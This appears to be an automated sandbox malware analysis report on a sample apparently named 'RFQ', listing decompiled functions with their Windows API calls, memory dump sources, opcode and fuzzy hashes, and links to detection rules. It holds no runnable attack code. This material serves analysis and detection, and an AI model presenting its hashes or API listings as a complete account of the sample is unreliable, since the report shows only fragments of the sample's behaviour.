                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                    • Opcode ID: 0a446a473e526123492e90d0dcdc7ece5110b4f3f3088e5ebc622f17b92e0115
                                                                                                                                                    • Instruction ID: 5492d48fb19d5c75182f37c070b1740a9a7bd6e303215f963399c2bb95a08246
                                                                                                                                                    • Opcode Fuzzy Hash: 0a446a473e526123492e90d0dcdc7ece5110b4f3f3088e5ebc622f17b92e0115
                                                                                                                                                    • Instruction Fuzzy Hash: AC21BB7124020AFBFF204E69AC89FBA77A9FB99364F10421CFA1092190D73ACC41A761
                                                                                                                                                    Function 00779568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00779588
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007795B9
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 007795CB
                                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00779605
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                                    • Opcode ID: 7390ab20b3dfaa2fcad4beec68bfb4d94edae0899bc7842c1b1c00c7fd481b6c
                                                                                                                                                    • Instruction ID: bc32237c3e43a34c055850a1dc13149d505e0fe4bc664eb79546e2a2c70fe082
                                                                                                                                                    • Opcode Fuzzy Hash: 7390ab20b3dfaa2fcad4beec68bfb4d94edae0899bc7842c1b1c00c7fd481b6c
                                                                                                                                                    • Instruction Fuzzy Hash: C121B270501216ABDF219F25DC05E9A7BF4BF443A4F208A19FAA9D72D0D778DD60CB20
                                                                                                                                                    Function 00779634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00779653
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00779683
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00779694
                                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007796CE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                                    • Opcode ID: 8314a7d296a98fa28961b4ed65f65fdacc2ef778ccb7a2e17154f116b68418c0
                                                                                                                                                    • Instruction ID: 6874b5f097f8e241bd8de9832c9c4dd42cd4ca857161ec9da0c981cd574329f7
                                                                                                                                                    • Opcode Fuzzy Hash: 8314a7d296a98fa28961b4ed65f65fdacc2ef778ccb7a2e17154f116b68418c0
                                                                                                                                                    • Instruction Fuzzy Hash: B221A1715012059BDF209F698C05E9A77F8AF457B4F208B18FAA5E72D0E7789851CB14
                                                                                                                                                    Function 0077DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0077DB0A
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0077DB5E
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077DB77
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,007CDC00), ref: 0077DBB5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                    • String ID: %lu
                                                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                                                    • Opcode ID: 48e3b16d2e3bfa11a08c95ab4352705e5834377e19e73df3756630b933da2ab5
                                                                                                                                                    • Instruction ID: 0a16014590284f04911a6294b9dabfb9d687f3b667d6d939fa9f5beb0ef279df
                                                                                                                                                    • Opcode Fuzzy Hash: 48e3b16d2e3bfa11a08c95ab4352705e5834377e19e73df3756630b933da2ab5
                                                                                                                                                    • Instruction Fuzzy Hash: 6F217175600108EFDB10EF64C989EAEB7B9EF48704B118069F509E7251DB79EE01CB60
                                                                                                                                                    Function 0076C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0076C84A
                                                                                                                                                      • Part of subcall function 0076C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0076C85D
                                                                                                                                                      • Part of subcall function 0076C82D: GetCurrentThreadId.KERNEL32 ref: 0076C864
                                                                                                                                                      • Part of subcall function 0076C82D: AttachThreadInput.USER32(00000000), ref: 0076C86B
                                                                                                                                                    • GetFocus.USER32 ref: 0076CA05
                                                                                                                                                      • Part of subcall function 0076C876: GetParent.USER32(?), ref: 0076C884
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0076CA4E
                                                                                                                                                    • EnumChildWindows.USER32(?,0076CAC4), ref: 0076CA76
                                                                                                                                                    • __swprintf.LIBCMT ref: 0076CA90
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                                                    • String ID: %s%d
                                                                                                                                                    • API String ID: 3187004680-1110647743
                                                                                                                                                    • Opcode ID: 45aecf12f7fe5931d0c17cde61c06dcd500a07e5a28975f936b51a89e35537bf
                                                                                                                                                    • Instruction ID: 24e210fbcb28b43d041d041845f63452d16ff3834f9ab511e5291e4d56f4b82e
                                                                                                                                                    • Opcode Fuzzy Hash: 45aecf12f7fe5931d0c17cde61c06dcd500a07e5a28975f936b51a89e35537bf
                                                                                                                                                    • Instruction Fuzzy Hash: 971145B5500209BBDB22BF949C89FF93768AF44714F00C065FD59AA142DB789945DB70
                                                                                                                                                    Function 00757A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 00757AD8
                                                                                                                                                      • Part of subcall function 00757CF4: __mtinitlocknum.LIBCMT ref: 00757D06
                                                                                                                                                      • Part of subcall function 00757CF4: EnterCriticalSection.KERNEL32(00000000,?,00757ADD,0000000D), ref: 00757D1F
                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00757AE5
                                                                                                                                                    • __lock.LIBCMT ref: 00757AF9
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00757B17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                    • String ID: `{
                                                                                                                                                    • API String ID: 1687444384-2310148178
                                                                                                                                                    • Opcode ID: 0646a1ebb2e9d648222b2990be8e95e61eb4e391eab742a559932042d8303bd8
                                                                                                                                                    • Instruction ID: 93ae220dda0c99be648b1cc6b48e96544c791c25cb58ad756843521bbd153d00
                                                                                                                                                    • Opcode Fuzzy Hash: 0646a1ebb2e9d648222b2990be8e95e61eb4e391eab742a559932042d8303bd8
                                                                                                                                                    • Instruction Fuzzy Hash: 240184B1505B00DFD720DF75D909789B7F0EF54322F20894EE896976A0CBF8A648CB55
                                                                                                                                                    Function 00791945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007919F3
                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00791A26
                                                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00791B49
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00791BBF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2364364464-0
                                                                                                                                                    • Opcode ID: e7c80145b897a1fecf4b9b36b8a27200cb49c4135d1451d846776e7c3094f8f0
                                                                                                                                                    • Instruction ID: 5781fb1e9e1d693bd17767f935fce0fa8288059362be88a253e1a4cd435bcd00
                                                                                                                                                    • Opcode Fuzzy Hash: e7c80145b897a1fecf4b9b36b8a27200cb49c4135d1451d846776e7c3094f8f0
                                                                                                                                                    • Instruction Fuzzy Hash: 9E8163B0600205EBDF11AF64C88ABADBBE5EF04720F54C459F905AF382D7B8AD51CB90
                                                                                                                                                    Function 0079E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0079E1D5
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0079E20D
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0079E248
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0079E269
                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0079E281
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188977179-0
                                                                                                                                                    • Opcode ID: 1525664f6cd8844ca9c8b9d51a7c1470611e5500e5b75c0323142cb9feae0344
                                                                                                                                                    • Instruction ID: 7c1b694d7ee46130024783164916150a57f043cdcf2440ab739b4cab0f8d3e62
                                                                                                                                                    • Opcode Fuzzy Hash: 1525664f6cd8844ca9c8b9d51a7c1470611e5500e5b75c0323142cb9feae0344
                                                                                                                                                    • Instruction Fuzzy Hash: F4618E34A40648EFDF20CF58D895FAA77BAAB49310F1480A9E959973A1C778AD40CB11
                                                                                                                                                    Function 00771C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00771CB4
                                                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00771D26
                                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00771D81
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00771DF8
                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00771E26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                    • Opcode ID: 49852d6eb0f3bad38d96ea185e9d5da74771ee1d31f44d0162e8c19a0b5ef5aa
                                                                                                                                                    • Instruction ID: 88467d4ec627f0b13c1432274f7153812b4b3a0c693edcd292e01ef47e42c867
                                                                                                                                                    • Opcode Fuzzy Hash: 49852d6eb0f3bad38d96ea185e9d5da74771ee1d31f44d0162e8c19a0b5ef5aa
                                                                                                                                                    • Instruction Fuzzy Hash: 9D5156B5A00209AFDB24CF58C884EAAB7B8FF4C354B158559ED59DB304E734EA11CFA0
                                                                                                                                                    Function 00790688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007906EE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0079077D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079079B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 007907E1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 007907FB
                                                                                                                                                      • Part of subcall function 0074E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0077A574,?,?,00000000,00000008), ref: 0074E675
                                                                                                                                                      • Part of subcall function 0074E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0077A574,?,?,00000000,00000008), ref: 0074E699
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 327935632-0
                                                                                                                                                    • Opcode ID: 4a8cd6c394cf69e904ab963118fe1d661414b50972beb28e689c45cc3e8c692a
                                                                                                                                                    • Instruction ID: 01c4b387d00f9052ac172c34df28fcd1427365ea65ee69b0199597e18a8c5fd0
                                                                                                                                                    • Opcode Fuzzy Hash: 4a8cd6c394cf69e904ab963118fe1d661414b50972beb28e689c45cc3e8c692a
                                                                                                                                                    • Instruction Fuzzy Hash: D0512775A00209DFDF10EFA8D885DADB7B5BF48320F058059EA15AB352DB38ED45CB81
                                                                                                                                                    Function 00792E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00792EEF
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00792F2E
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00792F75
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00792FA1
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00792FAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3740051246-0
                                                                                                                                                    • Opcode ID: c8cc684374ac9d54c039dfea962acc650b0fa0f72d70fdddfc5e42f7c2c9e04e
                                                                                                                                                    • Instruction ID: 1d2825e352c2703b5df01c9259f1ceb209cc0f06768449493aa153719f4f2a89
                                                                                                                                                    • Opcode Fuzzy Hash: c8cc684374ac9d54c039dfea962acc650b0fa0f72d70fdddfc5e42f7c2c9e04e
                                                                                                                                                    • Instruction Fuzzy Hash: B4515C72208204EFDB15EF54D885EAAB7F9FF88304F04891DF59597292EB38E905CB52
                                                                                                                                                    Function 0079CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1353f0bdb0956d39c515055ad8dd2652dfbf046f2579bcc6c53eda6ce74be86
                                                                                                                                                    • Instruction ID: b41ccbaf0aee843df4f5582266b9600eb1fd2f7f29b92a1da1f346a631ec1fe1
                                                                                                                                                    • Opcode Fuzzy Hash: a1353f0bdb0956d39c515055ad8dd2652dfbf046f2579bcc6c53eda6ce74be86
                                                                                                                                                    • Instruction Fuzzy Hash: 7041E679A00104EFCF22DF68EC48FA9BF68EB09350F144265F95AE72D1D738AD01DA54
                                                                                                                                                    Function 00781206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007812B4
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007812DD
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0078131C
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00781341
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00781349
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                                    • Opcode ID: e0e1e6466188e6e973125f439acc614c3e5918a0f2b7831412a11d9ef5cfa420
                                                                                                                                                    • Instruction ID: a036b596fd82059c5efd66c1ab551f0c11235bb4201c32e9daf1d1b783705db4
                                                                                                                                                    • Opcode Fuzzy Hash: e0e1e6466188e6e973125f439acc614c3e5918a0f2b7831412a11d9ef5cfa420
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41F975A00105DFDB05EF64C995AAEBBF5FF08310B148099E90AAB362DB35ED01DB51
                                                                                                                                                    Function 0074B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                    Download Yara Rule
